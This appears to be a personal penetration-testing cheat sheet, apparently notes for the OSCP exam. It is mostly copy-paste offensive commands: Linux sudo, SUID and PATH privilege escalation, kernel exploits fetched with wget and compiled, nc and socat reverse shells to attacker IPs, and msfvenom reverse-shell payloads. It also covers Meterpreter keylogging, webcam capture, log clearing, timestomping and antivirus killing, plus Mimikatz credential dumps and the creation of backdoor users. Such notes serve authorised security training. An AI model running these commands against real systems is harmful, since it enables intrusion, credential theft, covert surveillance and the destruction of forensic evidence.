Where can written to and executed from? A few 'common' places: /tmp, /var/tmp, /dev/shm find / -writable -type d 2>/dev/null # world-writeable folders find / -perm -222 -type d 2>/dev/null # world-writeable folders find / -perm -o+w -type d 2>/dev/null # world-writeable folders

find / -perm -o+x -type d 2>/dev/null # world-executable folders

find / ( -perm -o+w -perm -o+x ) -type d 2>/dev/null # world-writeable & executable folders

Any "problem" files? Word-writeable, "nobody" files find / -xdev -type d ( -perm -0002 -a ! -perm -1000 ) -print # world-writeable files find /dir -xdev ( -nouser -o -nogroup ) -print # Noowner files

Preparation & Finding Exploit Code What development tools/languages are installed/supported? find / -name perl* find / -name python* find / -name gcc* find / -name cc

How can files be uploaded? find / -name wget find / -name nc* find / -name netcat* find / -name tftp* find / -name ftp

Linux Privilege Escalation using Sudo Rights

NOTE: (ALL:ALL) can also represent as (ALL) If you found (root) in place of (ALL:ALL) then it denotes that user can run the command as root. If nothing is mention for user/group then it means sudo defaults to the root user.

Traditional Method to assign Root Privilege

visudo usertest ALL=(ALL:ALL) ALL or usertest ALL=(ALL) ALL

Spawn Root Access

Suppose you successfully login into victim’s machine through ssh and want to know sudo rights for the current user then execute below command. sudo -l In the traditional method, PASSWD option is enabled for user authentication while executing above command and it can be disabled by using NOPASSWD tag. The highlighted text is indicating that current user is authorized to execute all command. Therefore we have obtained root access by executing the command. sudo su id

Default Method to assign Root Privilege

Default Method to assign Root Privilege to usertest under User Privilege Specification category. visudo usertest ALL=ALL or usertest ALL=(root) ALL

Allow Root Privilege to Binary commands

Sometimes the user has the authorization to execute any file or command of a particular directory such as /bin/cp, /bin/cat or /usr/bin/ find, this type of permission lead to privilege escalation for root access and it can be implemented with help of following steps. usertest ALL=(root) NOPASSWD: /usr/bin/find NOTE: Here NOPASSWD tag that means no password will be requested for the user while running sudo -l command.

Spawn Root Access using Find Command

compromised the Victim’s system and then move for privilege escalation phase and execute below command to view sudo user list. sudo -l

User usertest may run the following commands on ubuntu (root) NOPASSWD: /usr/bin/find indicating that the usertest can run any command through find command. Therefore we got root access by executing below commands. sudo find /home -exec /bin/bash ; id uid=0(root) gid=0(root) groups=0(root)

Allow Root Privilege to Binary Programs

Sometimes admin assigns delicate authorities to a particular user to run binary programs which allow a user to edit any system files such as /etc/passwd and so on. certain binary programs lead to privilege escalation. In the following command we have assign sudo rights to the following program which can be run as root user. usertest ALL= (root) NOPASSWD: usr/bin/perl, /usr/bin/python, /usr/bin/less, /usr/bin/awk, /usr/bin/man, /usr/bin/vi

Spawn shell using Perl one-liner

At the time of privilege, escalation phase executes below command to view sudo user list. sudo -l Now you can observe the text is showing that the usertest can run Perl language program or script as root user. (/usr/bin/perl) Therefore we got root access by executing Perl one-liner. perl -e 'exec "/bin/bash";'

Spawn shell using Python one-liner

requires that the user can run the python language or script as root user. (/usr/bin/python) this can be determined by running sudo -l thus we can aquire root access by executing the python one-liner python -c 'import pty;pty.spawn("/bin/bash")'

Spawn shell using Less Command

requires that the user can run the less command as root user. (usr/bin/less) this can be determined by running sudo -l Hence we obtained root access by executing following sudo less /etc/hosts It will open requested system file for editing, BUT for spawning root shell type !bash as shown below and hit enter. !bash You will get root access.

Spawn shell using AWK one-liner

requires that the user can run the AWK language program or script as root user. (usr/bin/awk) this can be determined by running sudo -l Therefore we obtained root access by executing AWK one-liner. sudo awk 'BEGIN {system("/bin/bash")}'

Spawn shell using Man Command (Manual page)

requires that the user can run the less command as root user. (usr/bin/man) this can be determined by running sudo -l sudo man man It will be displaying Linux manual pages for editing, BUT for spawning root shell type !bash as presented below and hit enter, you get root access as done above using Less command. !bash You will get root access.

Spawn Shell Using FTP

get root access through FTP with the help of following commands: sudo ftp ! /bin/bash whoami or ! /bin/sh id whoami

root

Spawn Shell Using Socat

get root access through socat with the help of following commands. Execute below command on the attacker’s terminal in order to enable listener for reverse connection. socat file:tty,raw,echo=0 tcp-listen:1234 Then run the following command on victim’s machine and you will get root access on your attacker machine. socat exec:'sh -li',pty,stderr,setsid,sigint,sane tcp:192.168.1.105:1234 id whoami

root

Part Two Sequential Thinking Process#####

Defacto Linux Privilege Escalation Guide - A much more through guide for linux enumeration: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

Try the obvious - Maybe the user can sudo to root:

sudo su

Here are the commands I have learned to use to perform linux enumeration and privledge escalation: What services are running as root?: ps aux | grep root

What files run as root / SUID / GUID?: find / -perm +2000 -user root -type f -print find / -perm -1000 -type d 2>/dev/null # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here. find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user who started it. find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it. find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID for i in locate -r "bin$"; do find $i ( -perm -4000 -o -perm -2000 ) -type f 2>/dev/null; done find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} ; 2>/dev/null

What folders are world writeable?: find / -writable -type d 2>/dev/null # world-writeable folders find / -perm -222 -type d 2>/dev/null # world-writeable folders find / -perm -o w -type d 2>/dev/null # world-writeable folders find / -perm -o x -type d 2>/dev/null # world-executable folders find / ( -perm -o w -perm -o x ) -type d 2>/dev/null # world-writeable & executable folders

There are a few scripts that can automate the linux enumeration process: Google is my favorite Linux Kernel exploitation search tool. Many of these automated checkers are missing important kernel exploits which can create a very frustrating blindspot during your OSCP course.

LinuxPrivChecker.py - My favorite automated linux priv enumeration checker - https://www.securitysift.com/download/linuxprivchecker.py

LinEnum - (Recently Updated) https://github.com/rebootuser/LinEnum

linux-exploit-suggester (Recently Updated) https://github.com/mzet-/linux-exploit-suggester

Highon.coffee Linux Local Enum - Great enumeration script! wget https://highon.coffee/downloads/linux-local-enum.sh

Linux Privilege Exploit Suggester (Old has not been updated in years) https://github.com/PenturaLabs/Linux_Exploit_Suggester

Linux post exploitation enumeration and exploit checking tools https://github.com/reider-roque/linpostexp

####Handy Kernel Exploits####

CVE-2010-2959 - 'CAN BCM' Privilege Escalation - Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32) https://www.exploit-db.com/exploits/14814/ wget -O i-can-haz-modharden.c http://www.exploit-db.com/download/14814 $ gcc i-can-haz-modharden.c -o i-can-haz-modharden $ ./i-can-haz-modharden [+] launching root shell!

id

uid=0(root) gid=0(root)

CVE-2010-3904 - Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8 https://www.exploit-db.com/exploits/15285/

CVE-2012-0056 - Mempodipper - Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64) https://git.zx2c4.com/CVE-2012-0056/about/ Linux CVE 2012-0056 wget -O exploit.c http://www.exploit-db.com/download/18411 gcc -o mempodipper exploit.c ./mempodipper

CVE-2016-5195 - Dirty Cow - Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8 https://dirtycow.ninja/ First existed on 2.6.22 (released in 2007) and was fixed on Oct 18, 2016

Run a command as a user other than root sudo -u haxzor /usr/bin/vim /etc/apache2/sites-available/000-default.conf

Add a user or change a password /usr/sbin/useradd -p 'openssl passwd -1 thePassword' haxzor echo thePassword | passwd haxzor --stdin

####Local Privilege Escalation Exploit in Linux####

SUID (Set owner User ID up on execution) Often SUID C binary files are required to spawn a shell as a superuser, you can update the UID / GID and shell as required.

below are some quick copy and paste examples for various shells:

SUID C Shell for /bin/bash

int main(void){ setresuid(0, 0, 0); system("/bin/bash"); }

SUID C Shell for /bin/sh

int main(void){ setresuid(0, 0, 0); system("/bin/sh"); }

Building the SUID Shell binary gcc -o suid suid.c For 32 bit: gcc -m32 -o suid suid.c

####Create and compile an SUID from a limited shell (no file transfer)####

echo "int main(void){\nsetgid(0);\nsetuid(0);\nsystem("/bin/sh");\n}" >privsc.c gcc privsc.c -o privsc

Handy command if you can get a root user to run it. Add the www-data user to Root SUDO group with no password requirement: echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update

You may find a command is being executed by the root user, you may be able to modify the system PATH environment variable to execute your command instead. In the example below, ssh is replaced with a reverse shell SUID connecting to 10.10.10.1 on port 4444. set PATH="/tmp:/usr/local/bin:/usr/bin:/bin" echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.1 4444 >/tmp/f" >> /tmp/ssh chmod +x ssh

####SearchSploit####

searchsploit –uncsearchsploit apache 2.2 searchsploit "Linux Kernel" searchsploit linux 2.6 | grep -i ubuntu | grep local searchsploit slmail

Kernel Exploit Suggestions for Kernel Version 3.0.0 ./usr/share/linux-exploit-suggester/Linux_Exploit_Suggester.pl -k 3.0.0

Precompiled Linux Kernel Exploits - Super handy if GCC is not installed on the target machine! https://www.kernel-exploits.com/

Collect root password cat /etc/shadow |grep root

Find and display the proof.txt or flag.txt - LOOT! cat find / -name proof.txt -print

Finding exploit code http://www.exploit-db.com http://1337day.com http://www.securiteam.com http://www.securityfocus.com http://www.exploitsearch.net http://metasploit.com/modules/ http://securityreason.com http://seclists.org/fulldisclosure/ http://www.google.com

Finding more information regarding the exploit http://www.cvedetails.com http://packetstormsecurity.org/files/cve/[CVE] http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE] http://www.vulnview.com/cve-details.php?cvename=[CVE]

(Quick) "Common" exploits. Warning. Pre-compiled binaries files. Use at your own risk http://tarantula.by.ru/localroot/ http://www.kecepatan.66ghz.com/file/local-root-exploit-priv9/

METASPLOIT

See Metasploit Unleashed Course

Search for exploits using Metasploit GitHub framework source code: https://github.com/rapid7/metasploit-framework Translate them for use on OSCP LAB or EXAM.

Metasploit MetaSploit requires Postfresql systemctl start postgresql

To enable Postgresql on startup systemctl enable postgresql

MSF Syntax Start metasploit msfconsole msfconsole -q

Show help for command show -h

Show Auxiliary modules show auxiliary

Use a module use auxiliary/scanner/snmp/snmp_enum use auxiliary/scanner/http/webdav_scanner use auxiliary/scanner/smb/smb_version use auxiliary/scanner/ftp/ftp_login use exploit/windows/pop3/seattlelab_pass

Show the basic information for a module info

Show the configuration parameters for a module show options

Set options for a module set RHOSTS 192.168.1.1-254 set THREADS 10

Run the module run

Execute an Exploit exploit

Search for a module search type:auxiliary login

Metasploit Database Access Show all hosts discovered in the MSF database hosts

Scan for hosts and store them in the MSF database db_nmap

Search machines for specific ports in MSF database services -p 443

Leverage MSF database to scan SMB ports (auto-completed rhosts) services -p 443 --rhosts

You may find some boxes that are vulnerable to MS17-010 (AKA. EternalBlue). Although, not offically part of the indended course, this exploit can be leveraged to gain SYSTEM level access to a Windows box. I have never had much luck using the built in Metasploit EternalBlue module. I found that the elevenpaths version works much more relabily. Here are the instructions to install it taken from the following YouTube video: https://www.youtube.com/watch?v=4OHLor9VaRI

1. First step is to configure the Kali to work with wine 32bit

dpkg --add-architecture i386 && apt-get update && apt-get install wine32 rm -r ~/.wine wine cmd.exe exit

1. Download the exploit repostory https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

2. Move the exploit to /usr /share /metasploit-framework /modules /exploits /windows /smb

3. Start metasploit console (spoolsv.exe as the PROCESSINJECT yielded results on OSCP boxes.)

use exploit/windows/smb/eternalblue_doublepulsar msf exploit(eternalblue_doublepulsar) > set RHOST 10.10.10.10 RHOST => 10.11.1.73 msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT spoolsv.exe PROCESSINJECT => spoolsv.exe msf exploit(eternalblue_doublepulsar) > run

####Experimenting with Meterpreter####

Get system information from Meterpreter Shell sysinfo

Get user id from Meterpreter Shell getuid

Search for a file search -f *pass*.txt

Upload a file upload /usr/share/windows-binaries/nc.exe c:\\Users\\Offsec

Download a file download c:\\Windows\\system32\\calc.exe /tmp/calc.exe

Invoke a command shell from Meterpreter Shell shell

Exit the meterpreter shell exit

Metasploit Exploit Multi Handler multi/handler to accept an incoming reverse_https_meterpreter

payload use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_https set LHOST $ip set LPORT 443 exploit [*] Started HTTPS reverse handler on https://$ip:443/

Building Your Own MSF Module mkdir -p ~/.msf4/modules/exploits/linux/misc cd ~/.msf4/modules/exploits/linux/misc cp /usr/share/metasploitframework/modules/exploits/linux/misc/gld\_postfix.rb ./crossfire.rb nano crossfire.rb

Post Exploitation with Metasploit - (available options depend on OS and Meterpreter Cababilities)

• download Download a file or directory upload Upload a file or directory portfwd Forward a local port to a remote service route View and modify the routing table keyscan_start Start capturing keystrokes keyscan_stop Stop capturing keystrokes screenshot Grab a screenshot of the interactive desktop record_mic Record audio from the default microphone for X seconds webcam_snap Take a snapshot from the specified webcam getsystem Attempt to elevate your privilege to that of local system. hashdump Dumps the contents of the SAM database

---

####Materpreter Study Notes

Baisc system commands

background # placed in the background of the current session Sessions # Sessions to see -h help sessions -i # kill -k session into the session bgrun / RUN # implementation of the existing module, double-click the tab enter the run, has been listed Some scripts info # View existing module information getuid # View current user identity getprivs # View current user permissions getpid # Get current process ID (PID) sysinfo # View target machine system information irb # Open ruby terminal ps # View is running Process kill # Kill the specified PID process idletime # View target idle time reboot / shutdown # Restart / Shutdown shell # Enter target cmd shell

Common cmd commands

Whoami # Current privilege quser # Query current online administrator net user # View existing user net user username/password/add # Add user and corresponding password net localgroup User group name username/add # Add the specified user to the specified user group netstat -ano # Query the current network connection communication in the computer, LISTENING indicates that the port is in the listening state; ESTABLISHED indicates that the port is in the working (communication) state systeminfo # View the details of the current computer tasklist /svc # View each process corresponding to services taskkill / f / im program name # name of the end of a specified program taskkill / f / PID ID # end of a specified process PID tasklist | findstr "string" # Find content specified output logoff # cancellation of a Specify the user's ID shutdown -r # Restart the current computer netsh adcfirewall setAllprofiles state off # Turn off the firewall

Uictl switch keyboard / mouse

Uictl [ enable/disable ] [ keyboard/mouse/all ] # enable or disable keyboard/mouse uictl disable mouse # disable mouse uictl disable keyboard # disable keyboard

Execute executable file

the Execute # executable file on the target machine execute -H -i -f cmd.exe create a new process cmd.exe #, -H invisible, -i interactive execute -H -m -d notepad.exe -f payload.exe - a "-o hack.txt"

-d Process name displayed during execution of the target host (for masquerading) -m Direct execution from memory

"-o hack.txt" is the running parameter of payload.exe

Migrate process migration

Getpid # Get the current process's pid ps # View the current active process migrate # Migrate the Meterpreter session to the specified pid value in the process kill #kill the process

Clearav clear log

Clearav # Clear application logs, system logs, security logs in windows

Timestomp forged timestamp

Timestomp C: \ -h View help timestomp -v C: \ 2 .txt View timestamp timestomp C: \ 2 .txt -f C: \ 1 .txt #Copy the timestamp of 1.txt Give 2. txt timestomp c: \ test \ 22 .txt -z "03/10/2019 11:55:55" -v # Set the four properties to uniform time

Portfwd port forwarding

Portfwd add -l 1111 -p 3389 -r 127 .0.0.1 #Forward the 3389 port of the target machine to the local port 1111 rdesktop 127 .0.0.1:1111 # Need to enter the username and password to connect rdesktop -u Administrator -p 123 127 .0.0.1:1111 # -u username -p password

Autoroute add route

run autoroute -h # View help run get_local_subnets # View target intranet segment address run autoroute -s 192 .168.183.0/24 # Add target network segment route run autoroute -p # View added route run post/windows/gather/arp_scanner RHOSTS = 192 .168.183.0/24 run auxiliary/scanner/portscan/tcp RHOSTS = 192 .168.183.146 PORTS = 3389

Socks agent

Reference: https://www.freebuf.com/articles/network/125278.html use auxiliary/server/socks4a set srvhost 127 .0.0.1 set srvport 2000 run

Common script

Run arp_scanner -r 192 .168.183.1/24 # Use arp for surviving host scan run winenum # automate some detection scripts run credcollect # get user hash run domain_list_gen # get domain management account list run post/multi/gather/env # get User environment variable run post/windows/gather/enum_logged_on_users -c # List current login user run post/linux/gather/checkvm # virtual machine run post/windows/gather/checkvm # virtual machine run post/windows/gather/ Forensics/enum_drives # View memory information run post/windows/gather/enum_applications # Get installation software information run post/windows/gather/dumplinks # Get recently accessed documents, link information run post/windows/gather/enum_ie # Get IE cache run post/windows/gather/enum_firefox # Get firefox cache run post/windows/gather/enum_chrome # Get Chrome cache run post/multi/recon/local_exploit_suggester # Get local privilege vulnerability run post/windows/gather/enum_patches # Get patch information run post/windows/gather/enum_domain # Find domain control run post/windows/gather/enum_snmp # Get snmp community name run post/windows/gather/credentials/vnc # Get vnc password run post/windows/wlan/ Wlan_profile # Used to read the target host WiFi password run post/multi/gather/wlan_geolocate # Based on wlan, the location confirmation file is located at /root/.msf4/loot run post/windows/manage/killav close antivirus software

Common crack module

Auxiliary/scanner/mssql/mssql_login Auxiliary/scanner/ftp/ftp_login Auxiliary/scanner/ssh/ssh_login Auxiliary/scanner/telnet/telnet_login Auxiliary/scanner/smb/smb_login Auxiliary/scanner/mssql/mssql_login Auxiliary/scanner/mysql/mysql_login Auxiliary/scanner/oracle/oracle_login Auxiliary/scanner/postgres/postgres_login Auxiliary/scanner/vnc/vnc_login Auxiliary/scanner/pcanywhere/pcanywhere_login Auxiliary/scanner/snmp/snmp_login Auxiliary/scanner/ftp/anonymous

Keylogger

Keyscan_start # Start key record keyscan_dump # Export record data keyscan_stop # End key record

Sniffer capture package

Use sniffer Sniffer_interfaces # View NIC sniffer_start 1 # Select NIC 1 to start capturing sniffer_stats 1 # View NIC 1 status sniffer_dump 1 /tmp/wlan1.pcap # Export pcap packet sniffer_stop 1 # Stop NIC 1 capture sniffer_release 1 # Release NIC 1 traffic

Webcam

record_mic　 # audio recording webcam_chat # open a video chat (the other party pop) webcam_list # view camera webcam_snap # through the camera to take pictures webcam_stream # open by video surveillance cameras (to monitor ≈ live as a web page)

Screen capture

Screenshot # Screenshots use espia # Use espia module screengrab # screenshot

Getgui command

run getgui –h # View help run getgui -e # Open remote desktop run getgui -u admin -p admin # Add user run getgui -f 6666 -e # 3389 port forward to 6666

---

CORE COMMANDS ? - help menu background - moves the current session to the background bgkill - kills a background meterpreter script bglist - provides a list of all running background scripts bgrun - runs a script as a background thread channel - displays active channels close - closes a channel exit - terminates a meterpreter session help - help menu interact - interacts with a channel irb - go into Ruby scripting mode migrate - moves the active process to a designated PID quit - terminates the meterpreter session read - reads the data from a channel run - executes the meterpreter script designated after it use - loads a meterpreter extension write - writes data to a channel

FILE SYSTEM COMMANDS cat - read and output to stdout the contents of a file cd - change directory on the victim del - delete a file on the victim download - download a file from the victim system to the attacker system edit - edit a file with vim getlwd - print the local directory getwd - print working directory lcd - change local directory lpwd - print local directory ls - list files in current directory mkdir - make a directory on the victim system pwd - print working directory rm - delete a file rmdir - remove directory on the victim system upload - upload a file from the attacker system to the victim

NETWORK COMMANDS ipconfig - displays network interfaces with key information including IP address, etc. portfwd - forwards a port on the victim system to a remote service route - view or modify the victim routing table

SYSTEM COMMANDS clearav - clears the event logs on the victim's computer drop_token - drops a stolen token execute - executes a command getpid - gets the current process ID (PID) getprivs - gets as many privileges as possible getuid - get the user that the server is running as kill - terminate the process designated by the PID ps - list running processes reboot - reboots the victim computer reg - interact with the victim's registry rev2self - calls RevertToSelf() on the victim machine shell - opens a command shell on the victim machine shutdown - shuts down the victim's computer steal_token - attempts to steal the token of a specified (PID) process sysinfo - gets the details about the victim computer such as OS and name

User Interface Commands enumdesktops - lists all accessible desktops getdesktop - get the current meterpreter desktop idletime - checks to see how long since the victim system has been idle keyscan_dump - dumps the contents of the software keylogger keyscan_start - starts the software keylogger when associated with a process such as Word or browser keyscan_stop - stops the software keylogger screenshot - grabs a screenshot of the meterpreter desktop set_desktop - changes the meterpreter desktop uictl - enables control of some of the user interface components

PRIVILAGE ESCALATION COMMANDS getsystem - uses 15 built-in methods to gain sysadmin privileges

PASSWORD DUMP COMMAND hashdump - grabs the hashes in the password (SAM) file

TIMESTOMP COMMAND timestomp - manipulates the modify, access, and create attributes of a file

[+] Creating Metasploit Payloads

List payloads msfvenom -l

Binaries

Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf

Windows msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe

Mac msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho

Web Payloads

PHP msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp

JSP msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp

WAR msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war

Scripting Payloads

Python msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py

Bash msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh

Perl msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl

Shellcode

For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.

Linux Based Shellcode msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f

Windows Based Shellcode msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f

Mac Based Shellcode msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f

Handlers

Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.

use exploit/multi/handler set PAYLOAD set LHOST set LPORT set ExitOnSession false exploit -j -z

Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘

-------------------------------------------------------------------------- Reminders

LOG EVERYTHING!

Metasploit - spool /home//.msf3/logs/console.log Save contents from each terminal! Linux - script myoutput.txt # Type exit to stop

[+] Disable network-manager service network-manager stop

[+] Set IP address ifconfig eth0 192.168.50.12/24

[+] Set default gateway route add default gw 192.168.50.9

[+] Set DNS servers echo "nameserver 192.168.100.2" >> /etc/resolv.conf

[+] Show routing table Windows - route print Linux - route -n

[+] Add static route Linux - route add -net 192.168.100.0/24 gw 192.16.50.9 Windows - route add 0.0.0.0 mask 0.0.0.0 192.168.50.9

[+] Subnetting easy mode ipcalc 192.168.0.1 255.255.255.0

[+] Windows SAM file locations c:\windows\system32\config c:\windows\repair bkhive system /root/hive.txt samdump2 SAM /root/hive.txt > /root/hash.txt

[+] Python Shell python -c 'import pty;pty.spawn("/bin/bash")'

-------------------------------------------------------------------------- Internet Host/Network Enumeration

[+] WHOIS Querying whois www.domain.com

[+] Resolve an IP using DIG dig @8.8.8.8 securitymuppets.com

[+] Find Mail servers for a domain dig @8.8.8.8 securitymuppets.com -t mx

[+] Find any DNS records for a domain dig @8.8.8.8 securitymuppets.com -t any

[+] Zone Transfer dig @192.168.100.2 securitymuppets.com -t axfr host -l securitymuppets.com 192.168.100.2 nslookup / ls -d domain.com.local

[+] Fierce fierce -dns -file <output_file> fierce -dns -dnsserver fierce -range -dnsserver fierce -dns -wordlist

-------------------------------------------------------------------------- IP Network scanning

[+] ARP Scan arp-scan 192.168.50.8/28 -I eth0

[+] NMAP Scans

[+] Nmap ping scan sudo nmap –sn -oA nmap_pingscan 192.168.100.0/24 (-PE)

[+] Nmap SYN/Top 100 ports Scan nmap -sS -F -oA nmap_fastscan 192.168.0.1/24

[+] Nmap SYN/Version All port Scan - ## Main Scan sudo nmap -sV -PN -p0- -T4 -A --stats-every 60s --reason -oA nmap_scan 192.168.0.1/24

[+] Nmap SYN/Version No Ping All port Scan sudo nmap -sV -Pn -p0- --exclude 192.168.0.1 --reason -oA nmap_scan 192.168.0.1/24

[+] Nmap UDP All port scan - ## Main Scan sudo nmap -sU -p0- --reason --stats-every 60s --max-rtt-timeout=50ms --max-retries=1 -oA nmap_scan 192.168.0.1/24

[+] Nmap UDP/Fast Scan nmap -F -sU -oA nmap_UDPscan 192.168.0.1/24

[+] Nmap Top 1000 port UDP Scan nmap -sU -oA nmap_UDPscan 192.168.0.1/24

[+] HPING3 Scans hping3 -c 3 -s 53 -p 80 -S 192.168.0.1 Open = flags = SA Closed = Flags = RA Blocked = ICMP unreachable Dropped = No response

[+] Source port scanning nmap -g (88 (Kerberos) port 53 (DNS) or 67 (DHCP)) Source port also doesn't work for OS detection.

[+] Speed settings -n Disable DNS resolution -sS TCP SYN (Stealth) Scan -Pn Disable host discovery -T5 Insane time template --min-rate 1000 1000 packets per second --max-retries 0 Disable retransmission of timed-out probes

[+] Netcat (swiss army knife)

Connect mode (ncat is client) | default port is 31337

ncat []

Listen mode (ncat is server) | default port is 31337

ncat -l [] []

Transfer file (closes after one transfer)

ncat -l [] [] < file

Transfer file (stays open for multiple transfers)

ncat -l --keep-open [] [] < file

Receive file

ncat [] [] > file

Brokering | allows for multiple clients to connect

ncat -l --broker [] []

Listen with SSL | many options, use ncat --help for full list

ncat -l --ssl [] []

Access control

ncat -l --allow ncat -l --deny

Proxying

ncat --proxy [:] --proxy-type {http | socks4} []

Chat server | can use brokering for multi-user chat

ncat -l --chat [] []

-------------------------------------------------------------------------- Cisco/Networking Commands

? - Help

• User mode

- Privileged mode

router(config)# - Global Configuration mode

enable secret more secure than enable password.

For example, in the configuration command: enable secret 5 $1$iUjJ$cDZ03KKGh7mHfX2RSbDqP. The enable secret has been hashed with MD5, whereas in the command: username jdoe password 7 07362E590E1B1C041B1E124C0A2F2E206832752E1A01134D The password has been encrypted using the weak reversible algorithm.

enable - Change to privileged mode to view configs config terminal/config t - Change to global config mode to modify

#show version - Gives you the router's configuration register (Firmware) #show running-config - Shows the router, switch, or firewall's current configuration #show ip route - show the router's routing table #show tech-support - Dump config but obscure passwords

-------------------------------------------------------------------------- Remote Information Services

[+] DNS Zone Transfer - host -l securitymuppets.com 192.168.100.2 Metasploit Auxiliarys: auxiliary/gather/enum_dns use auxiliary/gather/dns...

[+] Finger - Enumerate Users finger @192.168.0.1 finger -l -p user@ip-address auxiliary/scanner/finger/finger_users

[+] NTP Metasploit Auxiliarys

[+] SNMP onesixtyone -c /usr/share/doc/onesixtyone/dict.txt Metasploit Module snmp_enum snmpcheck -t snmpservice

[+] rservices rwho 192.168.0.1 rlogin -l root 192.168.0.17

[+] RPC Services rpcinfo -p Endpoint_mapper metasploit

-------------------------------------------------------------------------- Web Services

[+] WebDAV Metasploit Auxiliarys Upload shell to Vulnerable WebDAV directory: msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.20 LPORT=4444 R | msfencode -t asp -o shell.asp cadaver http://192.168.0.60/ put shell.asp shell.txt copy shell.txt shell.asp;.txt Start reverse handler - browse to http://192.168.0.60/shell.asp;.txt

[+] Nikto Web Scanner

To scan a particular host

perl nikto.pl -host [host IP/name]

To scan a host on multiple ports (default = 80)

perl nikto.pl -host [host IP/name] -port [port number 1], [port number 2], [port number 3]

To scan a host and output fingerprinted information to a file

perl nikto.pl -host [host IP/name] -output [output_file]

To use a proxy while scanning a host

perl nikto.pl -host [host IP/name] -useproxy [proxy address]

-------------------------------------------------------------------------- Windows Networking Services

[+] Get Domain Information: nltest /DCLIST:DomainName nltest /DCNAME:DomainName nltest /DSGETDC:DomainName

[+] Netbios Enumeration nbtscan -r 192.168.0.1-100 nbtscan -f hostfiles.txt

[+] enum4linux

[+] RID Cycling use auxiliary/scanner/smb/smb_lookupsid

[+] Null Session in Windows net use \192.168.0.1\IPC$ "" /u:""

[+] Null Session in Linux smbclient -L //192.168.99.131

-------------------------------------------------------------------------- Accessing Email Services

Metasploit Auxiliarys

[+] SMTP Open Relay Commands

[-] ncat -C 86.54.23.178 25 [-] HELO mail.co.uk [-] MAIL FROM: Attacker@mail.co.uk [-] RCPT TO: Victim@email.com [-] DATA Test Email - some malicious stuff!

-------------------------------------------------------------------------- VPN Testing

[+] ike-scan ike-scan 192.168.207.134 sudo ike-scan -A 192.168.207.134 sudo ike-scan -A 192.168.207.134 --id=myid -P192-168-207-134key

[+] pskcrack psk-crack -b 5 192-168-207-134key psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key psk-crack -d /path/to/dictionary 192-168-207-134key

-------------------------------------------------------------------------- Unix RPC

[+] NFS Mounts

Metasploit : auxiliary/scanner/nfs/nfsmount

rpcinfo -p 192.168.0.10

showmount -e 192.168.0.10 mount 192.168.0.10:/secret /mnt/share/

ssh-keygen mkdir /tmp/r00t mount -t nfs 192.168.0.10:/secret /mnt/share/ cat ~/.ssh/id_rsa.pub >> /mnt/share/root/.ssh/authorized_keys umount /mnt/share ssh root@192.168.0.10

-------------------------------------------------------------------------- Post Exploitation

[+] Command prompt access on Windows Host

pth-winexe -U Administrator% // cmd.exe

[+] Add Linux User /usr/sbin/useradd –g 0 –u 0 –o user echo user:password | /usr/sbin/chpasswd

[+] Add Windows User net user username password@1 /add net localgroup administrators username /add

[+] Solaris Commands useradd -o user passwd user usermod -R root user

[+] Dump remote SAM: PwDump.exe -u localadmin 192.168.0.1

[+] Mimikatz mimikatz # privilege::debug mimikatz # sekurlsa::logonPasswords full

[+] Meterpreter meterpreter> run winenum meterpreter> use post/windows/gather/smart_hashdump

meterpreter > use incognito meterpreter > list_tokens -u meterpreter > impersonate_token TVM\domainadmin meterpreter > add_user hacker password1 -h 192.168.0.10 meterpreter > add_group_user "Domain Admins" hacker -h 192.168.0.10

meterpreter > load mimikatz meterpreter > wdigest meterpreter > getWdigestPasswords Migrate if does not work!

[+] Kitrap0d Download vdmallowed.exe and vdmexploit.dll to victim Run vdmallowed.exe to execute system shell

[+] Windows Information On Windows: ipconfig /all systeminfo net localgroup administrators net view net view /domain

[+] SSH Tunnelling Remote forward port 222 ssh -R 127.0.0.1:4444:10.1.1.251:222 -p 443 root@192.168.10.118

-------------------------------------------------------------------------- Metasploit

To show all exploits that for a vulnerability

grep show exploits

To select an exploit to use

use

To see the current settings for a selected exploit

show options

